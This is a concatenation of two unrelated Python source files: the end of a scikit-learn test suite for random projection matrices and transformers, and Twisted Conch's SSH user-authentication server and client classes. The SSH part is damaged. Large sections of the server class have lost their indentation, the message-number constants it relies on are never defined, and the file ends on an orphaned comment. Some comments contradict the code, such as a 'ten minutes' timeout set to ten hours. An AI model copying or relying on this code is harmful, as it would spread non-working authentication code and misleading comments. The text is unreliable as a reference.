    # eps must lie in the open interval (0, 1) ...
    for bad_eps in (1.1, 0.0, -0.1):
        assert_raises(ValueError, johnson_lindenstrauss_min_dim, 100,
                      eps=bad_eps)
    # ... and n_samples must be strictly positive.
    assert_raises(ValueError, johnson_lindenstrauss_min_dim, 0, eps=0.5)
def test_input_size_jl_min_dim():
    """Array-valued n_samples/eps must be broadcast-compatible."""
    # Shapes (3,) vs (2,) cannot broadcast and must raise.  The original test
    # made this identical call twice (copy-paste duplication); once suffices.
    assert_raises(ValueError, johnson_lindenstrauss_min_dim,
                  3 * [100], eps=2 * [0.9])
    # Matching (10, 10) shapes are accepted and must not raise.
    johnson_lindenstrauss_min_dim(np.random.randint(1, 10, size=(10, 10)),
                                  eps=np.full((10, 10), 0.5))
###############################################################################
# tests random matrix generation
###############################################################################
def check_input_size_random_matrix(random_matrix):
    # Non-positive matrix dimensions must be rejected.
    for n_components, n_features in ((0, 0), (-1, 1), (1, -1), (1, 0),
                                     (-1, 0)):
        assert_raises(ValueError, random_matrix, n_components, n_features)
def check_size_generated(random_matrix):
    # The generated matrix must have exactly the requested shape.
    for requested_shape in ((1, 5), (5, 1), (5, 5), (1, 1)):
        assert random_matrix(*requested_shape).shape == requested_shape
def check_zero_mean_and_unit_norm(random_matrix):
    # Every generator should yield a transformation matrix whose (single)
    # column has zero mean and unit Euclidean norm.
    column = densify(random_matrix(10000, 1, random_state=0))
    assert_array_almost_equal(0, np.mean(column), 3)
    assert_array_almost_equal(1.0, np.linalg.norm(column), 1)
def check_input_with_sparse_random_matrix(random_matrix):
    # density outside the half-open interval (0, 1] must be rejected.
    n_components, n_features = 5, 10
    for invalid_density in (-1., 0.0, 1.1):
        assert_raises(ValueError, random_matrix, n_components, n_features,
                      density=invalid_density)
@pytest.mark.parametrize("random_matrix", all_random_matrix)
def test_basic_property_of_random_matrix(random_matrix):
    # Check basic properties of random matrix generation: input validation,
    # output shape, and zero-mean/unit-norm of the generated columns.
    check_input_size_random_matrix(random_matrix)
    check_size_generated(random_matrix)
    check_zero_mean_and_unit_norm(random_matrix)
@pytest.mark.parametrize("random_matrix", all_sparse_random_matrix)
def test_basic_property_of_sparse_random_matrix(random_matrix):
    check_input_with_sparse_random_matrix(random_matrix)
    # At density=1.0 a sparse generator degenerates to a dense one and must
    # still satisfy the zero-mean / unit-norm guarantees.
    random_matrix_dense = functools.partial(random_matrix, density=1.0)
    check_zero_mean_and_unit_norm(random_matrix_dense)
def test_gaussian_random_matrix():
    # Statistical sanity check: entries of a Gaussian random matrix should be
    # drawn i.i.d. from a_ij ~ N(0.0, 1 / n_components), so the sample mean
    # is ~0 and the sample variance is ~1 / n_components.
    n_components, n_features = 100, 1000
    matrix = _gaussian_random_matrix(n_components, n_features, random_state=0)
    assert_array_almost_equal(0.0, np.mean(matrix), 2)
    assert_array_almost_equal(np.var(matrix, ddof=1), 1 / n_components, 1)
def test_sparse_random_matrix():
    # Check some statical properties of sparse random matrix
    n_components = 100
    n_features = 500
    # density=1.0 exercises the degenerate (dense) case; 0.3 the sparse one.
    for density in [0.3, 1.]:
        s = 1 / density
        A = _sparse_random_matrix(n_components,
                                  n_features,
                                  density=density,
                                  random_state=0)
        A = densify(A)
        # Check possible values: entries are limited to 0 and +/- sqrt(s)/sqrt(n_components).
        values = np.unique(A)
        assert np.sqrt(s) / np.sqrt(n_components) in values
        assert - np.sqrt(s) / np.sqrt(n_components) in values
        if density == 1.0:
            # Fully dense: zero never occurs, only the two signed values.
            assert np.size(values) == 2
        else:
            assert 0. in values
            assert np.size(values) == 3
        # Check that the random matrix follow the proper distribution.
        # Let's say that each element of a_{ij} of A is taken from
        #
        # - -sqrt(s) / sqrt(n_components)   with probability 1 / 2s
        # -  0                              with probability 1 - 1 / s
        # - +sqrt(s) / sqrt(n_components)   with probability 1 / 2s
        #
        # Empirical frequencies of each value must match those probabilities.
        assert_almost_equal(np.mean(A == 0.0),
                            1 - 1 / s, decimal=2)
        assert_almost_equal(np.mean(A == np.sqrt(s) / np.sqrt(n_components)),
                            1 / (2 * s), decimal=2)
        assert_almost_equal(np.mean(A == - np.sqrt(s) / np.sqrt(n_components)),
                            1 / (2 * s), decimal=2)
        # The indicator variables are Bernoulli, so their sample variance must
        # match p * (1 - p) for the corresponding probability p.
        assert_almost_equal(np.var(A == 0.0, ddof=1),
                            (1 - 1 / s) * 1 / s, decimal=2)
        assert_almost_equal(np.var(A == np.sqrt(s) / np.sqrt(n_components),
                                   ddof=1),
                            (1 - 1 / (2 * s)) * 1 / (2 * s), decimal=2)
        assert_almost_equal(np.var(A == - np.sqrt(s) / np.sqrt(n_components),
                                   ddof=1),
                            (1 - 1 / (2 * s)) * 1 / (2 * s), decimal=2)
###############################################################################
# tests on random projection transformer
###############################################################################
def test_sparse_random_projection_transformer_invalid_density():
    # density must lie in (0, 1]; anything else must raise at fit time.
    for RandomProjection in all_SparseRandomProjection:
        for invalid_density in (1.1, 0, -0.1):
            assert_raises(ValueError,
                          RandomProjection(density=invalid_density).fit, data)
def test_random_projection_transformer_invalid_input():
    # 'auto' with too few features, or a negative target dimensionality,
    # must raise at fit time.
    bad_cases = [({'n_components': 'auto'}, [[0, 1, 2]]),
                 ({'n_components': -10}, data)]
    for RandomProjection in all_RandomProjection:
        for kwargs, X in bad_cases:
            assert_raises(ValueError, RandomProjection(**kwargs).fit, X)
def test_try_to_transform_before_fit():
    # transform() on a transformer that was never fitted must raise.
    for RandomProjection in all_RandomProjection:
        unfitted = RandomProjection(n_components='auto')
        assert_raises(ValueError, unfitted.transform, data)
def test_too_many_samples_to_find_a_safe_embedding():
    # With eps this tight the JL bound exceeds the original dimensionality,
    # so 'auto' cannot find a safe embedding and must raise with this message.
    data, _ = make_sparse_random_data(1000, 100, 1000)
    expected_msg = (
        'eps=0.100000 and n_samples=1000 lead to a target dimension'
        ' of 5920 which is larger than the original space with'
        ' n_features=100')
    for RandomProjection in all_RandomProjection:
        rp = RandomProjection(n_components='auto', eps=0.1)
        assert_raise_message(ValueError, expected_msg, rp.fit, data)
def test_random_projection_embedding_quality():
    # Johnson-Lindenstrauss contract: with automatically tuned n_components,
    # pairwise squared distances are preserved within a factor of (1 +/- eps).
    data, _ = make_sparse_random_data(8, 5000, 15000)
    eps = 0.2
    original_distances = euclidean_distances(data, squared=True).ravel()
    # Drop zero (self) distances so the ratio below never divides by zero.
    non_identical = original_distances != 0.0
    original_distances = original_distances[non_identical]
    for RandomProjection in all_RandomProjection:
        rp = RandomProjection(n_components='auto', eps=eps, random_state=0)
        embedded = rp.fit_transform(data)
        embedded_distances = euclidean_distances(embedded, squared=True).ravel()
        embedded_distances = embedded_distances[non_identical]
        distances_ratio = embedded_distances / original_distances
        assert distances_ratio.max() < 1 + eps
        assert 1 - eps < distances_ratio.min()
def test_SparseRandomProjection_output_representation():
    for ProjectionCls in all_SparseRandomProjection:
        # dense_output=True forces a dense ndarray even for sparse input.
        rp = ProjectionCls(n_components=10, dense_output=True, random_state=0)
        rp.fit(data)
        assert isinstance(rp.transform(data), np.ndarray)
        sparse_data = sp.csr_matrix(data)
        assert isinstance(rp.transform(sparse_data), np.ndarray)
        # dense_output=False: the output representation follows the input's.
        rp = ProjectionCls(n_components=10, dense_output=False,
                           random_state=0)
        rp = rp.fit(data)
        assert isinstance(rp.transform(data), np.ndarray)
        assert sp.issparse(rp.transform(sparse_data))
def test_correct_RandomProjection_dimensions_embedding():
    for RandomProjection in all_RandomProjection:
        rp = RandomProjection(n_components='auto',
                              random_state=0,
                              eps=0.5).fit(data)
        # the number of components is adjusted from the shape of the training
        # set; the constructor parameter stays 'auto', the fitted value is
        # stored in n_components_.
        assert rp.n_components == 'auto'
        assert rp.n_components_ == 110
        if RandomProjection in all_SparseRandomProjection:
            assert rp.density == 'auto'
            assert_almost_equal(rp.density_, 0.03, 2)
        assert rp.components_.shape == (110, n_features)
        projected_1 = rp.transform(data)
        assert projected_1.shape == (n_samples, 110)
        # once the RP is 'fitted' the projection is always the same
        projected_2 = rp.transform(data)
        assert_array_equal(projected_1, projected_2)
        # fit transform with same random seed will lead to the same results
        rp2 = RandomProjection(random_state=0, eps=0.5)
        projected_3 = rp2.fit_transform(data)
        assert_array_equal(projected_1, projected_3)
        # Try to transform with an input X of size different from fitted.
        assert_raises(ValueError, rp.transform, data[:, 1:5])
        # it is also possible to fix the number of components and the density
        # level
        if RandomProjection in all_SparseRandomProjection:
            rp = RandomProjection(n_components=100, density=0.001,
                                  random_state=0)
            projected = rp.fit_transform(data)
            assert projected.shape == (n_samples, 100)
            assert rp.components_.shape == (100, n_features)
            assert rp.components_.nnz < 115  # close to 1% density
            assert 85 < rp.components_.nnz  # close to 1% density
def test_warning_n_components_greater_than_n_features():
    # Asking for more output dimensions than input features must warn.
    n_features = 20
    samples, _ = make_sparse_random_data(5, n_features, int(n_features / 4))
    for RandomProjection in all_RandomProjection:
        assert_warns(DataDimensionalityWarning,
                     RandomProjection(n_components=n_features + 1).fit,
                     samples)
def test_works_with_sparse_data():
    # With the same seed, fitting on dense input and on its CSR counterpart
    # must produce identical projection components.
    n_features = 20
    dense, _ = make_sparse_random_data(5, n_features, int(n_features / 4))
    for RandomProjection in all_RandomProjection:
        fitted_dense = RandomProjection(n_components=3,
                                        random_state=1).fit(dense)
        fitted_sparse = RandomProjection(n_components=3,
                                         random_state=1).fit(
                                             sp.csr_matrix(dense))
        assert_array_almost_equal(densify(fitted_dense.components_),
                                  densify(fitted_sparse.components_))
|
|
# -*- test-case-name: twisted.conch.test.test_userauth -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of the ssh-userauth service.
Currently implemented authentication types are public-key and password.
Maintainer: Paul Swartz
"""
from __future__ import absolute_import, division
import struct
from twisted.conch import error, interfaces
from twisted.conch.ssh import keys, transport, service
from twisted.conch.ssh.common import NS, getNS
from twisted.cred import credentials
from twisted.cred.error import UnauthorizedLogin
from twisted.internet import defer, reactor
from twisted.python import failure, log
from twisted.python.compat import nativeString, _bytesChr as chr
class SSHUserAuthServer(service.SSHService):
"""
A service implementing the server side of the 'ssh-userauth' service. It
is used to authenticate the user on the other side as being able to access
this server.
@ivar name: the name of this service: 'ssh-userauth'
@type name: L{bytes}
@ivar authenticatedWith: a list of authentication methods that have
already been used.
@type authenticatedWith: L{list}
@ivar loginTimeout: the number of seconds we wait before disconnecting
the user for taking too long to authenticate
@type loginTimeout: L{int}
@ivar attemptsBeforeDisconnect: the number of failed login attempts we
allow before disconnecting.
@type attemptsBeforeDisconnect: L{int}
@ivar loginAttempts: the number of login attempts that have been made
@type loginAttempts: L{int}
@ivar passwordDelay: the number of seconds to delay when the user gives
an incorrect password
@type passwordDelay: L{int}
@ivar interfaceToMethod: a L{dict} mapping credential interfaces to
authentication methods. The server checks to see which of the
cred interfaces have checkers and tells the client that those methods
are valid for authentication.
@type interfaceToMethod: L{dict}
@ivar supportedAuthentications: A list of the supported authentication
methods.
@type supportedAuthentications: L{list} of L{bytes}
@ivar user: the last username the client tried to authenticate with
@type user: L{bytes}
@ivar method: the current authentication method
@type method: L{bytes}
@ivar nextService: the service the user wants started after authentication
has been completed.
@type nextService: L{bytes}
@ivar portal: the L{twisted.cred.portal.Portal} we are using for
authentication
@type portal: L{twisted.cred.portal.Portal}
@ivar clock: an object with a callLater method. Stubbed out for testing.
"""
name = b'ssh-userauth'
loginTimeout = 10 * 60 * 60
# 10 minutes before we disconnect them
attemptsBeforeDisconnect = 20
# 20 login attempts before a disconnect
passwordDelay = 1 # number of seconds to delay on a failed password
clock = reactor
interfaceToMethod = {
credentials.ISSHPrivateKey : b'publickey',
credentials.IUsernamePassword : b'password',
}
    def serviceStarted(self):
        """
        Called when the userauth service is started. Set up instance
        variables, check if we should allow password authentication (only
        allow if the outgoing connection is encrypted) and set up a login
        timeout.
        """
        self.authenticatedWith = []
        self.loginAttempts = 0
        self.user = None
        self.nextService = None
        self.portal = self.transport.factory.portal
        # Offer only the methods for which the portal actually has a
        # credentials checker registered (see interfaceToMethod).
        self.supportedAuthentications = []
        for i in self.portal.listCredentialsInterfaces():
            if i in self.interfaceToMethod:
                self.supportedAuthentications.append(self.interfaceToMethod[i])
        if not self.transport.isEncrypted('in'):
            # don't let us transport password in plaintext
            if b'password' in self.supportedAuthentications:
                self.supportedAuthentications.remove(b'password')
        # Disconnect the peer if authentication takes longer than
        # loginTimeout seconds; cancelled in serviceStopped.
        self._cancelLoginTimeout = self.clock.callLater(
            self.loginTimeout,
            self.timeoutAuthentication)
def serviceStopped(self):
"""
Called when the userauth service is stopped. Cancel the login timeout
if it's still going.
"""
if self._cancelLoginTimeout:
self._cancelLoginTimeout.cancel()
self._cancelLoginTimeout = None
    def timeoutAuthentication(self):
        """
        Called when the user has timed out on authentication. Disconnect
        with a DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE message.
        """
        # The timeout has already fired; nothing left to cancel.
        self._cancelLoginTimeout = None
        self.transport.sendDisconnect(
            transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
            b'you took too long')
def tryAuth(self, kind, user, data):
"""
Try to authenticate the user with the given method. Dispatches to a
auth_* method.
@param kind: the authentication method to try.
@type kind: L{bytes}
@param user: the username the client is authenticating with.
@type user: L{bytes}
@param data: authentication specific data sent by the client.
@type data: L{bytes}
@return: A Deferred called back if the method succeeded, or erred back
if it failed.
@rtype: C{defer.Deferred}
"""
log.msg('%r trying auth %r' % (user, kind))
if kind not in self.supportedAuthentications:
return defer.fail(
error.ConchError('unsupported authentication, failing'))
kind = nativeString(kind.replace(b'-', b'_'))
f = getattr(self, 'auth_%s' % (kind,), None)
if f:
ret = f(data)
if not ret:
return defer.fail(
error.ConchError(
'%s return None instead of a Deferred'
% (kind, )))
else:
return ret
return defer.fail(error.ConchError('bad auth type: %s' % (kind,)))
    def ssh_USERAUTH_REQUEST(self, packet):
        """
        The client has requested authentication.  Payload::
            string user
            string next service
            string method
            <authentication specific data>

        @type packet: L{bytes}
        """
        user, nextService, method, rest = getNS(packet, 3)
        if user != self.user or nextService != self.nextService:
            # A new user or target service invalidates partial progress
            # from earlier methods.
            self.authenticatedWith = [] # clear auth state
        self.user = user
        self.nextService = nextService
        self.method = method
        d = self.tryAuth(method, user, rest)
        if not d:
            self._ebBadAuth(
                failure.Failure(error.ConchError('auth returned none')))
            return
        # Success starts the next service; NotEnoughAuthentication is
        # translated to a partial-success failure; anything else is a
        # plain auth failure.
        d.addCallback(self._cbFinishedAuth)
        d.addErrback(self._ebMaybeBadAuth)
        d.addErrback(self._ebBadAuth)
        return d
    def _cbFinishedAuth(self, result):
        """
        The callback when user has successfully been authenticated.  For a
        description of the arguments, see L{twisted.cred.portal.Portal.login}.
        We start the service requested by the user.
        """
        (interface, avatar, logout) = result
        self.transport.avatar = avatar
        self.transport.logoutFunction = logout
        service = self.transport.factory.getService(self.transport,
                self.nextService)
        if not service:
            raise error.ConchError('could not get next service: %s'
                                  % self.nextService)
        log.msg('%r authenticated with %r' % (self.user, self.method))
        # Tell the client it is in, then hand the transport over to the
        # requested service.
        self.transport.sendPacket(MSG_USERAUTH_SUCCESS, b'')
        self.transport.setService(service())
    def _ebMaybeBadAuth(self, reason):
        """
        An intermediate errback.  If the reason is
        error.NotEnoughAuthentication, we send a MSG_USERAUTH_FAILURE, but
        with the partial success indicator set.

        @type reason: L{twisted.python.failure.Failure}
        """
        reason.trap(error.NotEnoughAuthentication)
        # The trailing b'\xff' byte is the "partial success" flag: the
        # method worked but further authentication is still required.
        self.transport.sendPacket(MSG_USERAUTH_FAILURE,
                NS(b','.join(self.supportedAuthentications)) + b'\xff')
    def _ebBadAuth(self, reason):
        """
        The final errback in the authentication chain.  If the reason is
        error.IgnoreAuthentication, we simply return; the authentication
        method has sent its own response.  Otherwise, send a failure message
        and (if the method is not 'none') increment the number of login
        attempts.

        @type reason: L{twisted.python.failure.Failure}
        """
        if reason.check(error.IgnoreAuthentication):
            return
        if self.method != b'none':
            # The b'none' probe is free; only real method failures are
            # logged and counted toward the disconnect limit.
            log.msg('%r failed auth %r' % (self.user, self.method))
            if reason.check(UnauthorizedLogin):
                log.msg('unauthorized login: %s' % reason.getErrorMessage())
            elif reason.check(error.ConchError):
                log.msg('reason: %s' % reason.getErrorMessage())
            else:
                log.msg(reason.getTraceback())
            self.loginAttempts += 1
            if self.loginAttempts > self.attemptsBeforeDisconnect:
                self.transport.sendDisconnect(
                    transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
                    b'too many bad auths')
                return
        # Trailing b'\x00' byte: no partial success.
        self.transport.sendPacket(
            MSG_USERAUTH_FAILURE,
            NS(b','.join(self.supportedAuthentications)) + b'\x00')
def auth_publickey(self, packet):
"""
Public key authentication. Payload::
byte has signature
string algorithm name
string key blob
[string signature] (if has signature is True)
Create a SSHPublicKey credential and verify it using our portal.
"""
hasSig = ord(packet[0:1])
algName, blob, rest = getNS(packet[1:], 2)
pubKey = keys.Key.fromString(blob)
signature = hasSig and getNS(rest)[0] or None
if hasSig:
b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
NS(self.user) + NS(self.nextService) + NS(b'publickey') +
chr(hasSig) + NS(pubKey.sshType()) + NS(blob))
c = credentials.SSHPrivateKey(self.user, algName, blob, b,
signature)
return self.portal.login(c, None, interfaces.IConchUser)
else:
c = credentials.SSHPrivateKey(self.user, algName, blob, None, None)
return self.portal.login(c, None,
interfaces.IConchUser).addErrback(self._ebCheckKey,
packet[1:])
    def _ebCheckKey(self, reason, packet):
        """
        Called back if the user did not send a signature.  If reason is
        error.ValidPublicKey then this key is valid for the user to
        authenticate with.  Send MSG_USERAUTH_PK_OK.
        """
        reason.trap(error.ValidPublicKey)
        # if we make it here, it means that the publickey is valid
        self.transport.sendPacket(MSG_USERAUTH_PK_OK, packet)
        # The PK_OK reply above is the response; signal the errback chain
        # not to send an additional failure message.
        return failure.Failure(error.IgnoreAuthentication())
    def auth_password(self, packet):
        """
        Password authentication.  Payload::
            string password

        Make a UsernamePassword credential and verify it with our portal.
        """
        # packet[0:1] is skipped -- presumably the leading boolean
        # (password-change flag) of the wire format; verify against the
        # client side, which sends b'\x00' + NS(password).
        password = getNS(packet[1:])[0]
        c = credentials.UsernamePassword(self.user, password)
        return self.portal.login(c, None, interfaces.IConchUser).addErrback(
                self._ebPassword)
def _ebPassword(self, f):
"""
If the password is invalid, wait before sending the failure in order
to delay brute-force password guessing.
"""
d = defer.Deferred()
self.clock.callLater(self.passwordDelay, d.callback, f)
return d
class SSHUserAuthClient(service.SSHService):
    """
    A service implementing the client side of 'ssh-userauth'.

    This service will try all authentication methods provided by the server,
    making callbacks for more information when necessary.

    @ivar name: the name of this service: 'ssh-userauth'
    @type name: L{str}
    @ivar preferredOrder: a list of authentication methods that should be used
        first, in order of preference, if supported by the server
    @type preferredOrder: L{list}
    @ivar user: the name of the user to authenticate as
    @type user: L{bytes}
    @ivar instance: the service to start after authentication has finished
    @type instance: L{service.SSHService}
    @ivar authenticatedWith: a list of strings of authentication methods we've
        tried
    @type authenticatedWith: L{list} of L{bytes}
    @ivar triedPublicKeys: a list of public key objects that we've tried to
        authenticate with
    @type triedPublicKeys: L{list} of L{Key}
    @ivar lastPublicKey: the last public key object we've tried to authenticate
        with
    @type lastPublicKey: L{Key}
    """
    name = b'ssh-userauth'
    # Methods are attempted in this order when the server offers them; any
    # other server-offered method sorts after these (see orderByPreference).
    preferredOrder = [b'publickey', b'password', b'keyboard-interactive']

    def __init__(self, user, instance):
        """
        @param user: the name of the user to authenticate as
        @type user: L{bytes}
        @param instance: the service to start after authentication has
            finished
        @type instance: L{service.SSHService}
        """
        self.user = user
        self.instance = instance

    def serviceStarted(self):
        """
        Reset authentication state and probe the server with the 'none'
        method to learn which methods it will accept.
        """
        self.authenticatedWith = []
        self.triedPublicKeys = []
        self.lastPublicKey = None
        self.askForAuth(b'none', b'')

    def askForAuth(self, kind, extraData):
        """
        Send a MSG_USERAUTH_REQUEST.

        @param kind: the authentication method to try.
        @type kind: L{bytes}
        @param extraData: method-specific data to go in the packet
        @type extraData: L{bytes}
        """
        # Remember the method so that SUCCESS/FAILURE/PK_OK replies can be
        # interpreted in context.
        self.lastAuth = kind
        self.transport.sendPacket(MSG_USERAUTH_REQUEST, NS(self.user) +
                NS(self.instance.name) + NS(kind) + extraData)

    def tryAuth(self, kind):
        """
        Dispatch to an authentication method.

        @param kind: the authentication method
        @type kind: L{bytes}
        """
        # b'keyboard-interactive' -> 'auth_keyboard_interactive', etc.
        kind = nativeString(kind.replace(b'-', b'_'))
        log.msg('trying to auth with %s' % (kind,))
        f = getattr(self, 'auth_%s' % (kind,), None)
        if f:
            return f()

    def _ebAuth(self, ignored, *args):
        """
        Generic callback for a failed authentication attempt.  Respond by
        asking for the list of accepted methods (the 'none' method)
        """
        self.askForAuth(b'none', b'')

    def ssh_USERAUTH_SUCCESS(self, packet):
        """
        We received a MSG_USERAUTH_SUCCESS.  The server has accepted our
        authentication, so start the next service.
        """
        self.transport.setService(self.instance)

    def ssh_USERAUTH_FAILURE(self, packet):
        """
        We received a MSG_USERAUTH_FAILURE.  Payload::
            string methods
            byte partial success

        If partial success is C{True}, then the previous method succeeded but
        is not sufficient for authentication. C{methods} is a comma-separated
        list of accepted authentication methods.

        We sort the list of methods by their position in
        C{self.preferredOrder}, removing methods that have already succeeded.
        We then call C{self.tryAuth} with the most preferred method.

        @param packet: the C{MSG_USERAUTH_FAILURE} payload.
        @type packet: L{bytes}

        @return: a L{defer.Deferred} that will be callbacked with L{None} as
            soon as all authentication methods have been tried, or L{None} if
            no more authentication methods are available.
        @rtype: C{defer.Deferred} or L{None}
        """
        canContinue, partial = getNS(packet)
        partial = ord(partial)
        if partial:
            self.authenticatedWith.append(self.lastAuth)

        def orderByPreference(meth):
            """
            Invoked once per authentication method in order to extract a
            comparison key which is then used for sorting.

            @param meth: the authentication method.
            @type meth: L{bytes}

            @return: the comparison key for C{meth}.
            @rtype: L{int}
            """
            if meth in self.preferredOrder:
                return self.preferredOrder.index(meth)
            else:
                # put the element at the end of the list.
                return len(self.preferredOrder)

        canContinue = sorted([meth for meth in canContinue.split(b',')
                              if meth not in self.authenticatedWith],
                             key=orderByPreference)
        log.msg('can continue with: %s' % canContinue)
        return self._cbUserauthFailure(None, iter(canContinue))

    def _cbUserauthFailure(self, result, iterator):
        """
        Try the next untried method from C{iterator}, or disconnect when
        none remain.  C{result} is truthy when a method has already been
        dispatched, in which case nothing more is done.
        """
        if result:
            return
        try:
            method = next(iterator)
        except StopIteration:
            self.transport.sendDisconnect(
                transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
                b'no more authentication methods available')
        else:
            d = defer.maybeDeferred(self.tryAuth, method)
            d.addCallback(self._cbUserauthFailure, iterator)
            return d

    def ssh_USERAUTH_PK_OK(self, packet):
        """
        This message (number 60) can mean several different messages depending
        on the current authentication type.  We dispatch to individual methods
        in order to handle this request.
        """
        func = getattr(self, 'ssh_USERAUTH_PK_OK_%s' %
                       nativeString(self.lastAuth.replace(b'-', b'_')), None)
        if func is not None:
            return func(packet)
        else:
            self.askForAuth(b'none', b'')

    def ssh_USERAUTH_PK_OK_publickey(self, packet):
        """
        This is MSG_USERAUTH_PK.  Our public key is valid, so we create a
        signature and try to authenticate with it.
        """
        publicKey = self.lastPublicKey
        # Build the exact byte string to sign: session id plus the
        # MSG_USERAUTH_REQUEST packet contents.  chr() returns str on
        # Python 3 and cannot be concatenated with bytes, so a one-byte
        # bytes object carries the message number instead.
        b = (NS(self.transport.sessionID) + bytes((MSG_USERAUTH_REQUEST,)) +
             NS(self.user) + NS(self.instance.name) + NS(b'publickey') +
             b'\x01' + NS(publicKey.sshType()) + NS(publicKey.blob()))
        d = self.signData(publicKey, b)
        if not d:
            self.askForAuth(b'none', b'')
            # this will fail, we'll move on
            return
        d.addCallback(self._cbSignedData)
        d.addErrback(self._ebAuth)

    def ssh_USERAUTH_PK_OK_password(self, packet):
        """
        This is MSG_USERAUTH_PASSWD_CHANGEREQ.  The password given has
        expired.  We ask for an old password and a new password, then send
        both back to the server.
        """
        prompt, language, rest = getNS(packet, 2)
        self._oldPass = self._newPass = None
        d = self.getPassword(b'Old Password: ')
        d = d.addCallbacks(self._setOldPass, self._ebAuth)
        d.addCallback(lambda ignored: self.getPassword(prompt))
        d.addCallbacks(self._setNewPass, self._ebAuth)

    def ssh_USERAUTH_PK_OK_keyboard_interactive(self, packet):
        """
        This is MSG_USERAUTH_INFO_RESPONSE.  The server has sent us the
        questions it wants us to answer, so we ask the user and send the
        responses.
        """
        name, instruction, lang, data = getNS(packet, 3)
        numPrompts = struct.unpack('!L', data[:4])[0]
        data = data[4:]
        prompts = []
        for i in range(numPrompts):
            prompt, data = getNS(data)
            # One byte after each prompt says whether the user's answer
            # should be echoed while typing.
            echo = bool(ord(data[0:1]))
            data = data[1:]
            prompts.append((prompt, echo))
        d = self.getGenericAnswers(name, instruction, prompts)
        d.addCallback(self._cbGenericAnswers)
        d.addErrback(self._ebAuth)

    def _cbSignedData(self, signedData):
        """
        Called back out of self.signData with the signed data.  Send the
        authentication request with the signature.

        @param signedData: the data signed by the user's private key.
        @type signedData: L{bytes}
        """
        publicKey = self.lastPublicKey
        self.askForAuth(b'publickey', b'\x01' + NS(publicKey.sshType()) +
                NS(publicKey.blob()) + NS(signedData))

    def _setOldPass(self, op):
        """
        Called back when we are choosing a new password.  Simply store the old
        password for now.

        @param op: the old password as entered by the user
        @type op: L{bytes}
        """
        self._oldPass = op

    def _setNewPass(self, np):
        """
        Called back when we are choosing a new password.  Get the old password
        and send the authentication message with both.

        @param np: the new password as entered by the user
        @type np: L{bytes}
        """
        op = self._oldPass
        self._oldPass = None
        # Leading b'\xff' marks this as a password-change request.
        self.askForAuth(b'password', b'\xff' + NS(op) + NS(np))

    def _cbGenericAnswers(self, responses):
        """
        Called back when we are finished answering keyboard-interactive
        questions.  Send the info back to the server in a
        MSG_USERAUTH_INFO_RESPONSE.

        @param responses: a list of L{bytes} responses
        @type responses: L{list}
        """
        data = struct.pack('!L', len(responses))
        for r in responses:
            data += NS(r.encode('UTF8'))
        self.transport.sendPacket(MSG_USERAUTH_INFO_RESPONSE, data)

    def auth_publickey(self):
        """
        Try to authenticate with a public key.  Ask the user for a public key;
        if the user has one, send the request to the server and return True.
        Otherwise, return False.

        @rtype: L{bool}
        """
        d = defer.maybeDeferred(self.getPublicKey)
        d.addBoth(self._cbGetPublicKey)
        return d

    def _cbGetPublicKey(self, publicKey):
        """
        Send a signatureless publickey query for the obtained key, or report
        False when no (valid) key was produced by getPublicKey.
        """
        if not isinstance(publicKey, keys.Key): # failure or None
            publicKey = None
        if publicKey is not None:
            self.lastPublicKey = publicKey
            self.triedPublicKeys.append(publicKey)
            log.msg('using key of type %s' % publicKey.type())
            # Leading b'\x00': no signature attached yet; the server answers
            # with PK_OK if it would accept this key.
            self.askForAuth(b'publickey', b'\x00' + NS(publicKey.sshType()) +
                    NS(publicKey.blob()))
            return True
        else:
            return False

    def auth_password(self):
        """
        Try to authenticate with a password.  Ask the user for a password.
        If the user will return a password, return True.  Otherwise, return
        False.

        @rtype: L{bool}
        """
        d = self.getPassword()
        if d:
            d.addCallbacks(self._cbPassword, self._ebAuth)
            return True
        else: # returned None, don't do password auth
            return False

    def auth_keyboard_interactive(self):
        """
        Try to authenticate with keyboard-interactive authentication.  Send
        the request to the server and return True.

        @rtype: L{bool}
        """
        log.msg('authing with keyboard-interactive')
        self.askForAuth(b'keyboard-interactive', NS(b'') + NS(b''))
        return True

    def _cbPassword(self, password):
        """
        Called back when the user gives a password.  Send the request to the
        server.

        @param password: the password the user entered
        @type password: L{bytes}
        """
        # Leading b'\x00': this is not a password-change request.
        self.askForAuth(b'password', b'\x00' + NS(password))

    def signData(self, publicKey, signData):
        """
        Sign the given data with the given public key.

        By default, this will call getPrivateKey to get the private key,
        then sign the data using Key.sign().

        This method is factored out so that it can be overridden to use
        alternate methods, such as a key agent.

        @param publicKey: The public key object returned from L{getPublicKey}
        @type publicKey: L{keys.Key}
        @param signData: the data to be signed by the private key.
        @type signData: L{bytes}
        @return: a Deferred that's called back with the signature
        @rtype: L{defer.Deferred}
        """
        key = self.getPrivateKey()
        if not key:
            return
        return key.addCallback(self._cbSignData, signData)

    def _cbSignData(self, privateKey, signData):
        """
        Called back when the private key is returned.  Sign the data and
        return the signature.

        @param privateKey: the private key object
        @type privateKey: L{keys.Key}
        @param signData: the data to be signed by the private key.
        @type signData: L{bytes}
        @return: the signature
        @rtype: L{bytes}
        """
        return privateKey.sign(signData)

    def getPublicKey(self):
        """
        Return a public key for the user.  If no more public keys are
        available, return L{None}.

        This implementation always returns L{None}.  Override it in a
        subclass to actually find and return a public key object.

        @rtype: L{Key} or L{None}
        """
        return None

    def getPrivateKey(self):
        """
        Return a L{Deferred} that will be called back with the private key
        object corresponding to the last public key from getPublicKey().
        If the private key is not available, errback on the Deferred.

        @rtype: L{Deferred} called back with L{Key}
        """
        return defer.fail(NotImplementedError())

    def getPassword(self, prompt=None):
        """
        Return a L{Deferred} that will be called back with a password.
        prompt is a string to display for the password, or None for a generic
        'user@hostname's password: '.

        @type prompt: L{bytes}/L{None}
        @rtype: L{defer.Deferred}
        """
        return defer.fail(NotImplementedError())

    def getGenericAnswers(self, name, instruction, prompts):
        """
        Returns a L{Deferred} with the responses to the prompts.

        @param name: The name of the authentication currently in progress.
        @param instruction: Describes what the authentication wants.
        @param prompts: A list of (prompt, echo) pairs, where prompt is a
            string to display and echo is a boolean indicating whether the
            user's response should be echoed as they type it.
        """
        return defer.fail(NotImplementedError())
# SSH userauth message numbers (RFC 4252).
